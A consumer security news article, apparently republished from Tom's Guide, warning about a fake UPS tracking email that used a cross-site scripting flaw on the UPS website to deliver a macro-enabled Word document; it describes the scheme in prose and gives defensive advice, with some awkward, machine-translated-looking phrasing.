1. Home
  2. Security
  3. Are you waiting for the package? Do not click on this fake UPS mail
Are you waiting for the package? Do not click on this fake UPS mail

Are you waiting for the package? Do not click on this fake UPS mail

Sophisticated scammers have been dropping malware on unsuspecting victims by inducing them to click on legitimate UPS tracking number links that direct them to the UPScom website

Phishing and malware scams can usually be avoided by checking the URL (web address) to which they are directed Usually, if the URL and the spoofed site do not match, it is a deadly sign

However, as reported by Twitter user Daniel Gallagher via Bleeping Computer, in this case, the victim ended up on the real UPS website and was downloaded when he opened the tracking number page may have been more inclined to trust the malicious Word document

The Word document itself is intentionally unreadable until the reader clicks on "Enable Content" and more files are downloaded

Gallagher called it "one of the best phishing emails I've seen in a long time"

UPScom has since fixed the specific flaw that allowed this scammer to inject malicious code into the company's website, and most best antivirus software detects malicious Word documents However, this will not be the last time this method is used in phishing or "malspam" (malicious spam) campaigns

The deception begins with a convincing e-mail message informing you that "a package has encountered an exception"

You are invited to "download and print an invoice to pick up your package at the UPS store" or click on a link for a tracking number

The only hint that this is bogus is the email sender's address, which includes "unitedparcelservice" but has a different dot-com name However, it would not be too difficult for the sender to "spoof" a legitimate UPScom e-mail address if they wanted to

Usually, email-based phishing scams can be avoided by hovering the mouse cursor over a link in the text When you do so, the URL of the link will appear at the bottom of the screen

In this case, however, hovering the mouse cursor over the tracking number or billing link will display the real UPScom web address Clicking on either will bring up a page on the UPS website that says, "Download will begin shortly"

The scammer exploits a cross-site scripting (XSS) flaw in the UPS site to add their own code, access another website, retrieve a Word document, and deliver it to site visitors

Here, the scheme becomes like a regular phishing/malspam scam and is most easily circumvented

When you open that Word document, the text will be blurry and unreadable; Microsoft Word will tell you that macros (small scripts that can be run in Office files) are disabled, but the Word file will "content" to see the text Enable" and tells you to "Enable

Needless to say, you should not enable content in a random Word, Excel, or PowerPoint document downloaded from the Internet

However, if you do so, a macro in the Word document will probably download a malicious png image Unfortunately, by the time Bleeping Computer was able to repeat this process, the image was no longer available, and it is not known exactly what this image contains

Given the amount of deception and misdirection it took to get to this point, there is no doubt that the image was not a good one

Source: https://www.tomsguide.com/news/ups-tracking-malware

Categories

Comments

There is no comments

About Us

Do you like technology and are you geek? Then, this is your magazine!

Navigation

Copyright © 2024 LivesTeching - F42